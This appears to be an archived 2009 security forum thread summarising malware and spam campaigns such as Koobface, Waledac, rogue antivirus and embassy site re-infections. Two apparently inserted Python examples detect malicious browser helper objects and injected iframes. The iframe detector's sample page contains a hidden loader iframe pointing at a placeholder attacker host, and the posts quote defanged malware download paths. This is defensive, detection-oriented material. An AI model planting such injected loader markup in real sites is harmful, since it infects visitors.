
Thread: SPAM frauds, fakes, and other MALWARE deliveries - archive

  1. #121
    Adviser Team AplusWebMaster
    Join Date: Oct 2005
    Location: USA
    Posts: 6,881

    Koobface... again

    More on same...

    Koobface... again
    - http://securitylabs.websense.com/con...erts/3403.aspx
    05.26.2009 - "... Koobface attempted another running campaign on Facebook. If infected, Facebook users start to spam their friends with a link to a malicious Web site. When users visit the link, they are redirected to various malicious and phishing pages. We detected these on numerous .be domains and TinyURL links. One such malicious page is a fake YouTube page that appears to be a funny video. The page tells visitors to upgrade their Flash player in order to play the video, and the Flash setup program is actually Koobface malware... Among other things, a proxy server is installed on the infected computer..."

    (Screenshots available at the Websense URL above.)

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #122
    Adviser Team AplusWebMaster

    Another "Digital Certificate" malware campaign

    FYI...

    Another "Digital Certificate" malware campaign
    - http://isc.sans.org/diary.html?storyid=6499
    Last Updated: 2009-06-01 16:21:12 UTC - "... a "Bank of America Digital Certificate Updating" scheme is used, where a victim of the luring email is directed to a fake website... Using the <Update Certificate> button here will net you a piece of Malware that has approximately 30% AV coverage (as indicated by VirusTotal). A quick analysis of said malware shows probable signs of, surprise-surprise, Waledac..."

    (Screenshot available at the URL above.)


  3. #123
    Adviser Team AplusWebMaster

    Twitter hit with rogue anti-virus scam

    FYI...

    - http://www.theregister.co.uk/2009/06..._malware_scam/
    2 June 2009 - "Twitter users over the weekend were the target of a scam that tried to infect them with rogue anti-virus software and other malware, in what is one of the first times the micro-blogging site has been hit by a known for-profit attack, a security researcher said. The problem started after a flurry of tweets directed users to a website promising "Best Video." The site appeared to offer content from YouTube, but behind the scenes, the site delivered a PDF document designed to infect those using vulnerable versions of Adobe's Reader program. Victims then received an urgent warning that their systems were infected and needed to be cleaned using fraudulent security software... The scam promoted a piece of rogue anti-virus software dubbed System Security."

    - http://www.viruslist.com/en/weblog?weblogid=208187734
    June 01, 2009 - "... fake program called "System Security" is being promoted... Most likely the cyber criminals behind this attack simply used the stolen credentials of those phished accounts to tweet the messages... If the trends we've seen on other social platforms are any indicator for Twitter then we can only expect an increase in attacks."
    (Screenshots available at the URL above.)

    - http://pandalabs.pandasecurity.com/a...ds-Attack.aspx
    11 June 09 - "... cyber criminals have been targeting Twitter users by creating thousands of messages (tweets) embedded with words involving trending topics and malicious URLs. If the URLs were accessed, the victims would arrive at a rogueware website designed to trick them into thinking that their computer is infected, therefore justifying the need to purchase the fake software offered. Since the initial discovery, we have been keeping a close eye on this attack, but the malicious tweets continue... The ease of carrying out this type of attack leads us to believe that this will not go away anytime soon... "

    Last edited by AplusWebMaster; 2009-06-17 at 15:11.

  4. #124
    Adviser Team AplusWebMaster

    SPAM down 15%...

    FYI...

    - http://www.marshal8e6.com/trace/i/FT...race.1003~.asp
    June 8, 2009 - "Last week the US Federal Trade Commission shut down a rogue ISP because it hosted a range of botnet command and control servers, malware, and child pornography. The ISP, known as 3FN (also as APS Telecom) was thought to be responsible for a number of spam botnet control servers, notably Pushdo/Cutwail... did this shutdown have any impact on spam? Looking at our Spam Statistics from last week, we do see a dip of about 15% in our Spam Volume Index (SVI)... And spam originating from the Pushdo botnet indeed seems to be affected. The proportion of spam from Pushdo has dipped, along with Mega-D. Rustock seems completely unaffected... spam from Pushdo is still coming in to our spam traps, but at a much reduced rate... In terms of its impact on spam, the event is not quite in the same league as the McColo shutdown last November when spam output was halved overnight, but it is still very welcome nonetheless..."

    (Charts available at the URL above.)


  5. #125
    Adviser Team AplusWebMaster

    More Blackhat SEO "scareware" campaigns...

    FYI...

    More Blackhat SEO "scareware" campaigns
    - http://ddanchev.blogspot.com/2009/06...nt-end-to.html
    June 08, 2009 - "... they've got no customers but the cybercriminals themselves maintaining a portfolio of over 7,000 adult related keywords which they have been using for blackhat SEO campaigns across thousands of automatically registered - CAPTCHA recognition outsourced - Blogspot accounts since February, 2009... Not only is life4info .info or dirsite .com a bogus free hosting provider, but the campaigns hosted by them are interacting with our "dear friends" at AS30407; VELCOM .com which Spamhaus describes as "N. American base of Ukrainian cybercrime spammers" - and with a reason."

    (Screenshots and more detail available at the URL above.)


  6. #126
    Adviser Team AplusWebMaster

    Malicious SPAM - Air France plane crash

    FYI...

    Malicious SPAM - Air France plane crash
    - http://securitylabs.websense.com/con...erts/3417.aspx
    06.11.2009 - "Websense... has detected a new malicious spam campaign pretending to deliver legitimate news updates about the Air France plane crash ( http://news.bbc.co.uk/1/hi/world/americas/8078147.stm ). The spam campaign is in Portuguese, and includes a link to view the first videos from the crash site. The link to the video leads to a Trojan Downloader file named: Video_AirFrance_447.com. If a user runs the file, it downloads a malicious executable file masquerading as an image from [removed].org/imgs/like2.jpg. The malware registers a password-stealing BHO component on the system masquerading as a McAfee SiteAdvisor component with this GUID: {9387b8b2-5508-11de-8729-c56f55d89593}. The GUID is linked to the malicious installed DLL file named mcieplg.dll under the system32 directory (%windir%\system32\mcieplg.dll). AV detection rates on this file are very low*..."
    * http://www.virustotal.com/analisis/c...914-1244673584

    (Screenshots available at the Websense URL above.)

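    The Websense alert above gives two concrete host artifacts for this campaign: the BHO CLSID {9387b8b2-5508-11de-8729-c56f55d89593} and the DLL mcieplg.dll under system32. The script below is an added example (not Websense's or this forum's code) showing how a responder can triage Browser Helper Object registrations offline from a registry export: it parses .reg text, resolves each BHO CLSID to its InprocServer32 DLL, and flags matches against those two indicators. The "loose DLL in system32" rule is an assumed heuristic of mine, not something the alert states, and SAMPLE_REG is a constructed export (the first BHO and its path are placeholders), not a capture from an infected machine.

```python
"""Triage Browser Helper Object (BHO) registrations from a Windows registry
export (.reg text). Added example, not code from the Websense alert quoted
above; SAMPLE_REG is a constructed export, not a capture from an infected host."""

# Indicators quoted in the Websense alert: the fake "McAfee SiteAdvisor" BHO.
KNOWN_BAD_CLSIDS = {"{9387b8b2-5508-11de-8729-c56f55d89593}"}
KNOWN_BAD_DLLS = {"mcieplg.dll"}

# Key paths are compared lower-cased because .reg exports preserve whatever
# case the registry holds.
BHO_PREFIX = ("hkey_local_machine\\software\\microsoft\\windows\\currentversion"
              "\\explorer\\browser helper objects\\")
CLSID_PREFIX = "hkey_classes_root\\clsid\\"

# Constructed export: one placeholder toolbar BHO plus the look-alike from the
# alert. The {11111111-...} CLSID and "Example Toolbar" path are invented.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]
"NoExplorer"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9387B8B2-5508-11DE-8729-C56F55D89593}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}]
@="Example Toolbar Helper"

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Program Files\\Example Toolbar\\exthelper.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{9387B8B2-5508-11DE-8729-C56F55D89593}]
@="McAfee SiteAdvisor"

[HKEY_CLASSES_ROOT\CLSID\{9387B8B2-5508-11DE-8729-C56F55D89593}\InprocServer32]
@="C:\\WINDOWS\\system32\\mcieplg.dll"
"ThreadingModel"="Apartment"
"""


def parse_reg(text):
    """Parse .reg export text into {lower-cased key path: {value name: data}}.
    Handles the quoted-string and dword forms; other value types are kept raw."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line and not line.startswith(";"):
            name, _, data = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            data = data.strip()
            if data.startswith('"') and data.endswith('"'):
                # .reg files write backslashes in string data as "\\"
                data = data[1:-1].replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def triage_bhos(reg_text):
    """Return one finding per registered BHO that trips an indicator."""
    keys = parse_reg(reg_text)
    findings = []
    for key in keys:
        if not key.startswith(BHO_PREFIX):
            continue
        clsid = key[len(BHO_PREFIX):]
        if not clsid.startswith("{"):
            continue  # not a CLSID subkey
        clsid_key = CLSID_PREFIX + clsid
        name = keys.get(clsid_key, {}).get("@", "")
        dll = keys.get(clsid_key + "\\inprocserver32", {}).get("@", "")
        dll_name = dll.rsplit("\\", 1)[-1].lower()
        reasons = []
        if clsid in KNOWN_BAD_CLSIDS:
            reasons.append("known-bad CLSID")
        if dll_name in KNOWN_BAD_DLLS:
            reasons.append("known-bad DLL name")
        # Heuristic (my assumption, not from the alert): third-party BHOs
        # normally live under Program Files; a loose DLL in system32 is unusual.
        if "\\system32\\" in dll.lower():
            reasons.append("DLL loaded directly from system32 (heuristic)")
        if reasons:
            findings.append({"clsid": clsid, "name": name, "dll": dll,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage_bhos(SAMPLE_REG):
        print(finding["clsid"], finding["dll"], "; ".join(finding["reasons"]))
```

    On a real host the input comes from `reg export` of the Browser Helper Objects key and of HKCR\CLSID, concatenated; reg.exe writes those files as UTF-16 with a BOM, so open them with encoding="utf-16" before passing the text in. The display name is reported on purpose: the alert's point is that the entry claims to be a McAfee component, so name-versus-path mismatches are what the analyst reads next.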

  7. #127
    Adviser Team AplusWebMaster

    SPAM - Fake EULAs, fixtools...

    FYI...

    - https://forums2.symantec.com/t5/blog...article-id/276
    06-12-2009 - "... SPAM (message) noted that Symantec was working with Microsoft to create a patch for "Conflicker." According to the spam message, Conficker is also called "Troj/Brisv.A"... The spam is accompanied by a file named "remtool_conf.exe." The spammers have taken an extra step ahead of just spreading their Trojans. This file is actually a Symantec fixtool for Trojan.Brisv bundled with the Trojan. So, when someone runs this file they actually run the Symantec Brisv fixtool, along with the Trojan completing its task. In this case, the dropped Trojan contacts a remote site in order to download another piece of malware, which is currently detected by Symantec products as Suspicious.MH690.A... We gave the infection a run on a test machine. Almost immediately we saw our own EULA... Running the email attachment did a few things–it dropped the original (signed) Symantec Trojan.Brisv fixtool into a temporary folder; it dropped a Trojan into the same folder; and, it ran the original fixtool. One can see that this is indeed Symantec’s own legitimate fixtool. But, the Trojan file "webexplorer.exe" is basically a downloader. It contacts a remote site in order to download another file called "winupdate.exe". As you’ve guessed, that is also a Trojan and is currently detected as Suspicious.MH690.A... If you have a need to run a Symantec fixtool, go to the Symantec website* and download it for free..."
    * http://www.symantec.com/business/sec...movaltools.jsp

    (Screenshots available at the first Symantec URL above.)


  8. #128
    Adviser Team AplusWebMaster

    Scam version of Big Brother...

    FYI...

    - https://forums2.symantec.com/t5/blog...article-id/200
    06-15-2009 - "It may not be encouraging news for scammers, but users are slowly but surely adopting a see-and-delete approach for the usual fake stories related to lotteries, dormant bank accounts, an inheritance of huge wealth, and relatives of deceased or exiled political leaders sharing their millions. However, lately the trends seem to show that news stories involving current events are being piggybacked or manipulated by scammers to trap users into falling for fraudulent offers... Another recent scam we have been monitoring involves an event resembling the highly rated television reality show Big Brother, which began on June 4 in the UK. Scammers have been inviting recipients to participate in their Big Brother World to be held on July 12 in London, UK... Scammers claim to be a Big Brother agent and will furnish the competition details once users respond to the mailed invitation. Users will need to reply with the application type along with their full name, address, age, and telephone number. Even a casual look at the email reveals several spelling mistakes that start right from the subject line and continue on throughout the message, including using “price” instead of “prize” in the mail body. We would recommend that users follow the usual practice of ignoring [and deleting] such unsolicited emails..."

    (Screenshot of scam e-mail available at the URL above.)


  9. #129
    Adviser Team AplusWebMaster

    MS09-017 exploit in the wild

    FYI...

    - http://blog.trendmicro.com/air-franc...point-exploit/
    June 17, 2009 - "After a blackhat SEO attack, cybercriminals are again using the terrifying catastrophe of Air France Flight 447 or about China-made C919 Jumbo Jets competing with Airbus and Boeing for malicious intent. This time, spam messages are sent with an attached PowerPoint presentation, which is specially crafted to exploit a vulnerability in Microsoft PowerPoint*. The spammed emails suggest that there are images in the attached PowerPoint presentation related to both the China-made jumbo jets and the Air France Flight 447, in order to lure the user into opening the specially crafted file... Users are strongly advised to apply the patch* provided by Microsoft to avoid being victimized by this threat..."
    * http://www.microsoft.com/technet/sec.../ms09-017.mspx


  10. #130
    Adviser Team AplusWebMaster

    Nonstop site re-infections

    FYI...

    Nonstop site re-infections
    - http://securitylabs.websense.com/con...logs/3425.aspx
    06.24.2009 - "We recently published an alert* about the Ethiopian Embassy site being compromised... This isn't the first time the site has been compromised. In March of 2009, we noticed an iframe injection pointing to hxxp://[REMOVED]vv.com/index.php. The domain was also serving virus-infected files in other locations, including hxxp://[REMOVED]vv.com/unic/1.exe, a Trojan [see VirusTotal report**]... Attackers are in control and re-compromising the site over and over, potentially infecting visitors with malicious code at any time. These attacks are somewhat of a trend. We've documented a number of compromised embassy sites in the past, illustrating how malware delivery occurs through Web sites..."
    * http://securitylabs.websense.com/con...erts/3423.aspx

    ** http://www.virustotal.com/analisis/9...5a9-1240536959
    "File 5143155606c013934a4601648e310800aff688c2.EXE ..."

    (Screenshots and more detail available at the Websense URL above.)

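    The re-infection described above works through an injected iframe pointing at an external index.php loader. As an added example (not Websense's or this forum's code), the script below shows the check a site owner can run against each fetched page to catch such an injection early: it collects every iframe, then flags any whose src is off-site and not on an allow-list, whose width or height is at most one pixel, or which is hidden by inline style. SAMPLE_PAGE is a constructed page; the host attacker-host.example is a placeholder standing in for the [REMOVED] domain in the alert, and "embassy.example" is an assumed site host.

```python
"""Flag injected iframes in fetched HTML, the pattern in the Websense post
above. Added example, not code from the alert; SAMPLE_PAGE is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag (case-insensitive)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lower-cases tag and attribute names
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for a width/height of 0 or 1 (with or without a 'px' suffix)."""
    try:
        return int(value.strip().lower().rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(html, site_host, allowed_hosts=()):
    """Return [{'src': ..., 'reasons': [...]}] for iframes that look injected."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        # A relative src has no host and therefore stays on the site itself.
        host = (urlsplit(src).hostname or site_host).lower()
        reasons = []
        if host != site_host and host not in allowed_hosts:
            reasons.append("off-site src: " + host)
        if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
            reasons.append("near-zero size")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed page: one legitimate same-site iframe and one injected loader.
SAMPLE_PAGE = """<html><body>
<h1>Embassy news</h1>
<iframe src="/news/calendar.html" width="600" height="400"></iframe>
<IFRAME SRC='http://attacker-host.example/index.php' WIDTH=1 HEIGHT=1 style="visibility: hidden"></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_PAGE, "embassy.example"):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

    Run this from a scheduled job that fetches the site's own pages as a visitor would; because the post notes the site was re-compromised repeatedly, the useful signal is the first run that returns a non-empty list after a clean one, which is the moment to pull the server logs rather than just remove the tag.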
